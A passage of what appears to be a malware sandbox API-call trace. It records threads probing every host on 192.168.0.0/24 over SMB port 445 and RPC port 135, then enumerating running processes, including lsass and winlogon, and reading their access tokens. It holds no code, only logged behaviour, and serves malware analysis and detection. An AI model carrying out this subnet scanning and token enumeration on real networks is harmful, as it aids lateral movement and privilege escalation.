0x8700 [0097.170] socket (af=2, type=1, protocol=6) returned 0x135c [0097.170] ioctlsocket (in: s=0x135c, cmd=-2147195266, argp=0x170bff34 | out: argp=0x170bff34) returned 0 [0097.170] connect (s=0x135c, name=0x170bff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.10"), namelen=16) returned -1 [0097.170] WSAGetLastError () returned 10035 [0097.170] select (in: nfds=0, readfds=0x0, writefds=0x170bfd08, exceptfds=0x170bfe10, timeout=0x170bff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x170bfd08, exceptfds=0x170bfe10) returned 0 [0102.243] closesocket (s=0x135c) returned 0 [0102.244] RtlExitUserThread (Status=0x0) Thread: id = 304 os_tid = 0xeac [0091.983] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x77d850 [0091.983] free (_Block=0x77d850) [0091.983] inet_addr (cp="192.168.0.9") returned 0x900a8c0 [0091.983] htons (hostshort=0x1bd) returned 0xbd01 [0091.983] socket (af=2, type=1, protocol=6) returned 0x1368 [0091.983] ioctlsocket (in: s=0x1368, cmd=-2147195266, argp=0x171fff34 | out: argp=0x171fff34) returned 0 [0091.983] connect (s=0x1368, name=0x171fff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.9"), namelen=16) returned -1 [0091.985] WSAGetLastError () returned 10035 [0091.985] select (in: nfds=0, readfds=0x0, writefds=0x171ffd08, exceptfds=0x171ffe10, timeout=0x171fff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x171ffd08, exceptfds=0x171ffe10) returned 0 [0097.176] closesocket (s=0x1368) returned 0 [0097.176] inet_addr (cp="192.168.0.9") returned 0x900a8c0 [0097.176] htons (hostshort=0x87) returned 0x8700 [0097.176] socket (af=2, type=1, protocol=6) returned 0x1368 [0097.177] ioctlsocket (in: s=0x1368, cmd=-2147195266, argp=0x171fff34 | out: argp=0x171fff34) returned 0 [0097.177] connect (s=0x1368, name=0x171fff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.9"), namelen=16) returned -1 [0097.177] WSAGetLastError () returned 10035 [0097.177] select (in: nfds=0, readfds=0x0, writefds=0x171ffd08, exceptfds=0x171ffe10, timeout=0x171fff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x171ffd08, exceptfds=0x171ffe10) returned 0 [0102.234] closesocket (s=0x1368) returned 0 [0102.235] RtlExitUserThread (Status=0x0) Thread: id = 305 os_tid = 0xeb0 [0091.985] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x77d828 [0091.985] free (_Block=0x77d828) [0091.985] inet_addr (cp="192.168.0.8") returned 0x800a8c0 [0091.985] htons (hostshort=0x1bd) returned 0xbd01 [0091.986] socket (af=2, type=1, protocol=6) returned 0x1374 [0091.986] ioctlsocket (in: s=0x1374, cmd=-2147195266, argp=0x1733ff34 | out: argp=0x1733ff34) returned 0 [0091.986] connect (s=0x1374, name=0x1733ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.8"), namelen=16) returned -1 [0091.987] WSAGetLastError () returned 10035 [0091.987] select (in: nfds=0, readfds=0x0, writefds=0x1733fd08, exceptfds=0x1733fe10, timeout=0x1733ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1733fd08, exceptfds=0x1733fe10) returned 0 [0097.175] closesocket (s=0x1374) returned 0 [0097.175] inet_addr (cp="192.168.0.8") returned 0x800a8c0 [0097.175] htons (hostshort=0x87) returned 0x8700 [0097.175] socket (af=2, type=1, protocol=6) returned 0x1374 [0097.175] ioctlsocket (in: s=0x1374, cmd=-2147195266, argp=0x1733ff34 | out: argp=0x1733ff34) returned 0 [0097.175] connect (s=0x1374, name=0x1733ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.8"), namelen=16) returned -1 [0097.176] WSAGetLastError () returned 10035 [0097.176] select (in: nfds=0, readfds=0x0, writefds=0x1733fd08, exceptfds=0x1733fe10, timeout=0x1733ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1733fd08, exceptfds=0x1733fe10) returned 0 [0102.236] closesocket (s=0x1374) returned 0 [0102.237] RtlExitUserThread (Status=0x0) Thread: id = 306 os_tid = 0xeb4 [0091.987] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x77d800 [0091.987] free (_Block=0x77d800) [0091.987] inet_addr (cp="192.168.0.7") returned 0x700a8c0 [0091.988] htons (hostshort=0x1bd) returned 0xbd01 [0091.988] socket (af=2, type=1, protocol=6) returned 0x1380 [0091.988] ioctlsocket (in: s=0x1380, cmd=-2147195266, argp=0x1747ff34 | out: argp=0x1747ff34) returned 0 [0091.988] connect (s=0x1380, name=0x1747ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.7"), namelen=16) returned -1 [0091.989] WSAGetLastError () returned 10035 [0091.989] select (in: nfds=0, readfds=0x0, writefds=0x1747fd08, exceptfds=0x1747fe10, timeout=0x1747ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1747fd08, exceptfds=0x1747fe10) returned 0 [0097.173] closesocket (s=0x1380) returned 0 [0097.174] inet_addr (cp="192.168.0.7") returned 0x700a8c0 [0097.174] htons (hostshort=0x87) returned 0x8700 [0097.174] socket (af=2, type=1, protocol=6) returned 0x1380 [0097.174] ioctlsocket (in: s=0x1380, cmd=-2147195266, argp=0x1747ff34 | out: argp=0x1747ff34) returned 0 [0097.174] connect (s=0x1380, name=0x1747ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.7"), namelen=16) returned -1 [0097.174] WSAGetLastError () returned 10035 [0097.174] select (in: nfds=0, readfds=0x0, writefds=0x1747fd08, exceptfds=0x1747fe10, timeout=0x1747ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1747fd08, exceptfds=0x1747fe10) returned 0 [0102.237] closesocket (s=0x1380) returned 0 [0102.238] RtlExitUserThread (Status=0x0) Thread: id = 307 os_tid = 0xeb8 [0091.994] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x1ff1c10 [0091.995] free (_Block=0x1ff1c10) [0091.995] inet_addr (cp="192.168.0.6") returned 0x600a8c0 [0091.995] htons (hostshort=0x1bd) returned 0xbd01 [0091.995] socket (af=2, type=1, protocol=6) returned 0x138c [0091.995] ioctlsocket (in: s=0x138c, cmd=-2147195266, argp=0x175bff34 | out: argp=0x175bff34) returned 0 [0091.995] connect (s=0x138c, name=0x175bff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.6"), namelen=16) returned -1 [0091.996] WSAGetLastError () returned 10035 [0091.996] select (in: nfds=0, readfds=0x0, writefds=0x175bfd08, exceptfds=0x175bfe10, timeout=0x175bff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x175bfd08, exceptfds=0x175bfe10) returned 0 [0097.172] closesocket (s=0x138c) returned 0 [0097.172] inet_addr (cp="192.168.0.6") returned 0x600a8c0 [0097.173] htons (hostshort=0x87) returned 0x8700 [0097.173] socket (af=2, type=1, protocol=6) returned 0x138c [0097.173] ioctlsocket (in: s=0x138c, cmd=-2147195266, argp=0x175bff34 | out: argp=0x175bff34) returned 0 [0097.173] connect (s=0x138c, name=0x175bff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.6"), namelen=16) returned -1 [0097.173] WSAGetLastError () returned 10035 [0097.173] select (in: nfds=0, readfds=0x0, writefds=0x175bfd08, exceptfds=0x175bfe10, timeout=0x175bff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x175bfd08, exceptfds=0x175bfe10) returned 0 [0102.239] closesocket (s=0x138c) returned 0 [0102.240] RtlExitUserThread (Status=0x0) Thread: id = 308 os_tid = 0xebc [0091.998] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x1ff1be8 [0091.998] free (_Block=0x1ff1be8) [0091.998] inet_addr (cp="192.168.0.5") returned 0x500a8c0 [0091.998] htons (hostshort=0x1bd) returned 0xbd01 [0091.998] socket (af=2, type=1, protocol=6) returned 0x1398 [0091.998] ioctlsocket (in: s=0x1398, cmd=-2147195266, argp=0x176fff34 | out: argp=0x176fff34) returned 0 [0091.998] connect (s=0x1398, name=0x176fff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.5"), namelen=16) returned -1 [0091.999] WSAGetLastError () returned 10035 [0091.999] select (in: nfds=0, readfds=0x0, writefds=0x176ffd08, exceptfds=0x176ffe10, timeout=0x176fff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x176ffd08, exceptfds=0x176ffe10) returned 0 [0097.171] closesocket (s=0x1398) returned 0 [0097.171] inet_addr (cp="192.168.0.5") returned 0x500a8c0 [0097.171] htons (hostshort=0x87) returned 0x8700 [0097.171] socket (af=2, type=1, protocol=6) returned 0x1398 [0097.171] ioctlsocket (in: s=0x1398, cmd=-2147195266, argp=0x176fff34 | out: argp=0x176fff34) returned 0 [0097.171] connect (s=0x1398, name=0x176fff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.5"), namelen=16) returned -1 [0097.172] WSAGetLastError () returned 10035 [0097.172] select (in: nfds=0, readfds=0x0, writefds=0x176ffd08, exceptfds=0x176ffe10, timeout=0x176fff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x176ffd08, exceptfds=0x176ffe10) returned 0 [0102.241] closesocket (s=0x1398) returned 0 [0102.242] RtlExitUserThread (Status=0x0) Thread: id = 309 os_tid = 0xec0 [0092.000] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x1ff1bc0 [0092.000] free (_Block=0x1ff1bc0) [0092.000] inet_addr (cp="192.168.0.4") returned 0x400a8c0 [0092.000] htons (hostshort=0x1bd) returned 0xbd01 [0092.000] socket (af=2, type=1, protocol=6) returned 0x13a4 [0092.000] ioctlsocket (in: s=0x13a4, cmd=-2147195266, argp=0x1783ff34 | out: argp=0x1783ff34) returned 0 [0092.000] connect (s=0x13a4, name=0x1783ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.4"), namelen=16) returned -1 [0092.001] WSAGetLastError () returned 10035 [0092.001] select (in: nfds=0, readfds=0x0, writefds=0x1783fd08, exceptfds=0x1783fe10, timeout=0x1783ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1783fd08, exceptfds=0x1783fe10) returned 0 [0097.183] closesocket (s=0x13a4) returned 0 [0097.183] inet_addr (cp="192.168.0.4") returned 0x400a8c0 [0097.183] htons (hostshort=0x87) returned 0x8700 [0097.184] socket (af=2, type=1, protocol=6) returned 0x13a4 [0097.184] ioctlsocket (in: s=0x13a4, cmd=-2147195266, argp=0x1783ff34 | out: argp=0x1783ff34) returned 0 [0097.184] connect (s=0x13a4, name=0x1783ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.4"), namelen=16) returned -1 [0097.184] WSAGetLastError () returned 10035 [0097.184] select (in: nfds=0, readfds=0x0, writefds=0x1783fd08, exceptfds=0x1783fe10, timeout=0x1783ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1783fd08, exceptfds=0x1783fe10) returned 0 [0102.252] closesocket (s=0x13a4) returned 0 [0102.253] RtlExitUserThread (Status=0x0) Thread: id = 310 os_tid = 0xec4 [0092.002] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x1fa0a98 [0092.002] free (_Block=0x1fa0a98) [0092.002] inet_addr (cp="192.168.0.3") returned 0x300a8c0 [0092.002] htons (hostshort=0x1bd) returned 0xbd01 [0092.002] socket (af=2, type=1, protocol=6) returned 0x13b0 [0092.002] ioctlsocket (in: s=0x13b0, cmd=-2147195266, argp=0x1797ff34 | out: argp=0x1797ff34) returned 0 [0092.002] connect (s=0x13b0, name=0x1797ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.3"), namelen=16) returned -1 [0092.003] WSAGetLastError () returned 10035 [0092.003] select (in: nfds=0, readfds=0x0, writefds=0x1797fd08, exceptfds=0x1797fe10, timeout=0x1797ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1797fd08, exceptfds=0x1797fe10) returned 0 [0097.182] closesocket (s=0x13b0) returned 0 [0097.182] inet_addr (cp="192.168.0.3") returned 0x300a8c0 [0097.182] htons (hostshort=0x87) returned 0x8700 [0097.182] socket (af=2, type=1, protocol=6) returned 0x13b0 [0097.182] ioctlsocket (in: s=0x13b0, cmd=-2147195266, argp=0x1797ff34 | out: argp=0x1797ff34) returned 0 [0097.182] connect (s=0x13b0, name=0x1797ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.3"), namelen=16) returned -1 [0097.183] WSAGetLastError () returned 10035 [0097.183] select (in: nfds=0, readfds=0x0, writefds=0x1797fd08, exceptfds=0x1797fe10, timeout=0x1797ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1797fd08, exceptfds=0x1797fe10) returned 0 [0102.253] closesocket (s=0x13b0) returned 0 [0102.254] RtlExitUserThread (Status=0x0) Thread: id = 311 os_tid = 0xec8 [0092.003] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x1fa0330 [0092.004] free (_Block=0x1fa0330) [0092.004] inet_addr (cp="192.168.0.2") returned 0x200a8c0 [0092.004] htons (hostshort=0x1bd) returned 0xbd01 [0092.004] socket (af=2, type=1, protocol=6) returned 0x13bc [0092.004] ioctlsocket (in: s=0x13bc, cmd=-2147195266, argp=0x17abff34 | out: argp=0x17abff34) returned 0 [0092.004] connect (s=0x13bc, name=0x17abff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.2"), namelen=16) returned -1 [0092.005] WSAGetLastError () returned 10035 [0092.005] select (in: nfds=0, readfds=0x0, writefds=0x17abfd08, exceptfds=0x17abfe10, timeout=0x17abff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x17abfd08, exceptfds=0x17abfe10) returned 0 [0097.180] closesocket (s=0x13bc) returned 0 [0097.181] inet_addr (cp="192.168.0.2") returned 0x200a8c0 [0097.181] htons (hostshort=0x87) returned 0x8700 [0097.181] socket (af=2, type=1, protocol=6) returned 0x13bc [0097.181] ioctlsocket (in: s=0x13bc, cmd=-2147195266, argp=0x17abff34 | out: argp=0x17abff34) returned 0 [0097.181] connect (s=0x13bc, name=0x17abff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.2"), namelen=16) returned -1 [0097.181] WSAGetLastError () returned 10035 [0097.181] select (in: nfds=0, readfds=0x0, writefds=0x17abfd08, exceptfds=0x17abfe10, timeout=0x17abff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x17abfd08, exceptfds=0x17abfe10) returned 0 [0102.255] closesocket (s=0x13bc) returned 0 [0102.255] RtlExitUserThread (Status=0x0) Thread: id = 312 os_tid = 0xecc [0092.005] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x77fef8 [0092.005] free (_Block=0x77fef8) [0092.005] inet_addr (cp="192.168.0.1") returned 0x100a8c0 [0092.005] htons (hostshort=0x1bd) returned 0xbd01 [0092.005] socket (af=2, type=1, protocol=6) returned 0x13c8 [0092.006] ioctlsocket (in: s=0x13c8, cmd=-2147195266, argp=0x17bfff34 | out: argp=0x17bfff34) returned 0 [0092.006] connect (s=0x13c8, name=0x17bfff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.1"), namelen=16) returned -1 [0092.006] WSAGetLastError () returned 10035 [0092.006] select (in: nfds=0, readfds=0x0, writefds=0x17bffd08, exceptfds=0x17bffe10, timeout=0x17bfff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x17bffd08, exceptfds=0x17bffe10) returned 0 [0097.179] closesocket (s=0x13c8) returned 0 [0097.179] inet_addr (cp="192.168.0.1") returned 0x100a8c0 [0097.179] htons (hostshort=0x87) returned 0x8700 [0097.179] socket (af=2, type=1, protocol=6) returned 0x13c8 [0097.179] ioctlsocket (in: s=0x13c8, cmd=-2147195266, argp=0x17bfff34 | out: argp=0x17bfff34) returned 0 [0097.179] connect (s=0x13c8, name=0x17bfff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.1"), namelen=16) returned -1 [0097.180] WSAGetLastError () returned 10035 [0097.180] select (in: nfds=0, readfds=0x0, writefds=0x17bffd08, exceptfds=0x17bffe10, timeout=0x17bfff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x17bffd08, exceptfds=0x17bffe10) returned 0 [0102.256] closesocket (s=0x13c8) returned 0 [0102.257] RtlExitUserThread (Status=0x0) Thread: id = 313 os_tid = 0xed0 [0092.007] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x77fea0 [0092.007] free (_Block=0x77fea0) [0092.007] inet_addr (cp="192.168.0.0") returned 0xa8c0 [0092.007] htons (hostshort=0x1bd) returned 0xbd01 [0092.007] socket (af=2, type=1, protocol=6) returned 0x13d4 [0092.007] ioctlsocket (in: s=0x13d4, cmd=-2147195266, argp=0x17d3ff34 | out: argp=0x17d3ff34) returned 0 [0092.007] connect (s=0x13d4, name=0x17d3ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.0"), namelen=16) returned -1 [0092.008] WSAGetLastError () returned 10035 [0092.008] select (in: nfds=0, readfds=0x0, writefds=0x17d3fd08, exceptfds=0x17d3fe10, timeout=0x17d3ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x17d3fd08, exceptfds=0x17d3fe10) returned 0 [0097.177] closesocket (s=0x13d4) returned 0 [0097.178] inet_addr (cp="192.168.0.0") returned 0xa8c0 [0097.178] htons (hostshort=0x87) returned 0x8700 [0097.178] socket (af=2, type=1, protocol=6) returned 0x13d4 [0097.178] ioctlsocket (in: s=0x13d4, cmd=-2147195266, argp=0x17d3ff34 | out: argp=0x17d3ff34) returned 0 [0097.178] connect (s=0x13d4, name=0x17d3ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.0"), namelen=16) returned -1 [0097.178] WSAGetLastError () returned 10035 [0097.178] select (in: nfds=0, readfds=0x0, writefds=0x17d3fd08, exceptfds=0x17d3fe10, timeout=0x17d3ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x17d3fd08, exceptfds=0x17d3fe10) returned 0 [0102.232] closesocket (s=0x13d4) returned 0 [0102.233] RtlExitUserThread (Status=0x0) Thread: id = 314 os_tid = 0xed4 [0092.008] RtlExitUserThread (Status=0x0) Thread: id = 315 os_tid = 0xed8 [0095.378] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x17f3fdc8 | out: TokenHandle=0x17f3fdc8*=0x11a0) returned 1 [0095.379] GetTokenInformation (in: TokenHandle=0x11a0, TokenInformationClass=0x12, TokenInformation=0x17f3fdc0, TokenInformationLength=0x4, ReturnLength=0x17f3fdcc | out: TokenInformation=0x17f3fdc0, ReturnLength=0x17f3fdcc) returned 1 [0095.379] GetTokenInformation (in: TokenHandle=0x11a0, TokenInformationClass=0x13, TokenInformation=0x17f3fdc0, TokenInformationLength=0x4, ReturnLength=0x17f3fdcc | out: TokenInformation=0x17f3fdc0, ReturnLength=0x17f3fdcc) returned 1 [0095.379] GetTokenInformation (in: TokenHandle=0x334, TokenInformationClass=0xa, TokenInformation=0x17f3fde8, TokenInformationLength=0x38, ReturnLength=0x17f3fdcc | out: TokenInformation=0x17f3fde8, ReturnLength=0x17f3fdcc) returned 1 [0095.379] CloseHandle (hObject=0x334) returned 1 [0095.379] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x334 [0095.402] Process32First (in: hSnapshot=0x334, lppe=0x17f3fe58 | out: lppe=0x17f3fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0095.403] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0095.403] Process32Next (in: hSnapshot=0x334, lppe=0x17f3fe58 | out: lppe=0x17f3fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0095.403] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x4) returned 0x1e8 [0095.403] OpenProcessToken (in: ProcessHandle=0x1e8, DesiredAccess=0xa, TokenHandle=0x17f3fdc4 | out: TokenHandle=0x17f3fdc4*=0x0) returned 0 [0095.404] CloseHandle (hObject=0x1e8) returned 1 [0095.404] Process32Next (in: hSnapshot=0x334, lppe=0x17f3fe58 | out: lppe=0x17f3fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0095.404] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x104) returned 0x1e8 [0095.404] OpenProcessToken (in: ProcessHandle=0x1e8, DesiredAccess=0xa, TokenHandle=0x17f3fdc4 | out: TokenHandle=0x17f3fdc4*=0x1194) returned 1 [0095.404] GetTokenInformation (in: TokenHandle=0x1194, TokenInformationClass=0xa, TokenInformation=0x17f3fe20, TokenInformationLength=0x38, ReturnLength=0x17f3fde4 | out: TokenInformation=0x17f3fe20, ReturnLength=0x17f3fde4) returned 1 [0095.404] CloseHandle (hObject=0x1194) returned 1 [0095.405] CloseHandle (hObject=0x1e8) returned 1 [0095.405] Process32Next (in: hSnapshot=0x334, lppe=0x17f3fe58 | out: lppe=0x17f3fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0095.405] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x148) returned 0x1e8 [0095.405] OpenProcessToken (in: ProcessHandle=0x1e8, DesiredAccess=0xa, TokenHandle=0x17f3fdc4 | out: TokenHandle=0x17f3fdc4*=0x1194) returned 1 [0095.405] GetTokenInformation (in: TokenHandle=0x1194, TokenInformationClass=0xa, TokenInformation=0x17f3fe20, TokenInformationLength=0x38, ReturnLength=0x17f3fde4 | out: TokenInformation=0x17f3fe20, ReturnLength=0x17f3fde4) returned 1 [0095.405] CloseHandle (hObject=0x1194) returned 1 [0095.405] CloseHandle (hObject=0x1e8) returned 1 [0095.406] Process32Next (in: hSnapshot=0x334, lppe=0x17f3fe58 | out: lppe=0x17f3fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0095.406] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x178) returned 0x1e8 [0095.406] OpenProcessToken (in: ProcessHandle=0x1e8, DesiredAccess=0xa, TokenHandle=0x17f3fdc4 | out: TokenHandle=0x17f3fdc4*=0x1194) returned 1 [0095.406] GetTokenInformation (in: TokenHandle=0x1194, TokenInformationClass=0xa, TokenInformation=0x17f3fe20, TokenInformationLength=0x38, ReturnLength=0x17f3fde4 | out: TokenInformation=0x17f3fe20, ReturnLength=0x17f3fde4) returned 1 [0095.406] CloseHandle (hObject=0x1194) returned 1 [0095.406] CloseHandle (hObject=0x1e8) returned 1 [0095.407] Process32Next (in: hSnapshot=0x334, lppe=0x17f3fe58 | out: lppe=0x17f3fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0095.407] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x184) returned 0x1e8 [0095.407] OpenProcessToken (in: ProcessHandle=0x1e8, DesiredAccess=0xa, TokenHandle=0x17f3fdc4 | out: TokenHandle=0x17f3fdc4*=0x1194) returned 1 [0095.407] GetTokenInformation (in: TokenHandle=0x1194, TokenInformationClass=0xa, TokenInformation=0x17f3fe20, TokenInformationLength=0x38, ReturnLength=0x17f3fde4 | out: TokenInformation=0x17f3fe20, ReturnLength=0x17f3fde4) returned 1 [0095.407] CloseHandle (hObject=0x1194) returned 1 [0095.407] CloseHandle (hObject=0x1e8) returned 1 [0095.408] Process32Next (in: hSnapshot=0x334, lppe=0x17f3fe58 | out: lppe=0x17f3fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0095.408] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1ac) returned 0x1e8 [0095.408] OpenProcessToken (in: ProcessHandle=0x1e8, DesiredAccess=0xa, TokenHandle=0x17f3fdc4 | out: TokenHandle=0x17f3fdc4*=0x1194) returned 1 [0095.408] GetTokenInformation (in: TokenHandle=0x1194, TokenInformationClass=0xa, TokenInformation=0x17f3fe20, TokenInformationLength=0x38, ReturnLength=0x17f3fde4 | out: TokenInformation=0x17f3fe20, ReturnLength=0x17f3fde4) returned 1 [0095.408] CloseHandle (hObject=0x1194) returned 1 [0095.408] CloseHandle (hObject=0x1e8) returned 1 [0095.409] Process32Next (in: hSnapshot=0x334, lppe=0x17f3fe58 | out: lppe=0x17f3fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0095.409] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1e8 [0095.409] OpenProcessToken (in: ProcessHandle=0x1e8, DesiredAccess=0xa, TokenHandle=0x17f3fdc4 | out: TokenHandle=0x17f3fdc4*=0x1194) returned 1 [0095.409] GetTokenInformation (in: TokenHandle=0x1194, TokenInformationClass=0xa, TokenInformation=0x17f3fe20, TokenInformationLength=0x38, ReturnLength=0x17f3fde4 | out: TokenInformation=0x17f3fe20, ReturnLength=0x17f3fde4) returned 1 [0095.409] CloseHandle (hObject=0x1194) returned 1 [0095.409] CloseHandle (hObject=0x1e8) returned 1 [0095.410] Process32Next (in: hSnapshot=0x334, lppe=0x17f3fe58 | out: lppe=0x17f3fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0095.410] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0095.410] OpenProcessToken (in: ProcessHandle=0x1e8, DesiredAccess=0xa, TokenHandle=0x17f3fdc4 | out: TokenHandle=0x17f3fdc4*=0x1194) returned 1 [0095.410] GetTokenInformation (in: TokenHandle=0x1194, TokenInformationClass=0xa, TokenInformation=0x17f3fe20, TokenInformationLength=0x38, ReturnLength=0x17f3fde4 | out: TokenInformation=0x17f3fe20, ReturnLength=0x17f3fde4) returned 1 [0095.410] CloseHandle (hObject=0x1194) returned 1 [0095.410] CloseHandle (hObject=0x1e8) returned 1 [0095.411] Process32Next (in: hSnapshot=0x334, lppe=0x17f3fe58 | out: lppe=0x17f3fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0095.411] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1e8) returned 0x1e8 [0095.411] OpenProcessToken (in: ProcessHandle=0x1e8, DesiredAccess=0xa, TokenHandle=0x17f3fdc4 | out: TokenHandle=0x17f3fdc4*=0x1194) returned 1 [0095.412] GetTokenInformation (in: TokenHandle=0x1194, TokenInformationClass=0xa, TokenInformation=0x17f3fe20, TokenInformationLength=0x38, ReturnLength=0x17f3fde4 | out: TokenInformation=0x17f3fe20, ReturnLength=0x17f3fde4) returned 1 [0095.412] CloseHandle (hObject=0x1194) returned 1 [0095.412] CloseHandle (hObject=0x1e8) returned 1 [0095.412] Process32Next (in: hSnapshot=0x334, lppe=0x17f3fe58 | out: lppe=0x17f3fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.412] OpenProcess (dwDesiredAccess=0x1000, 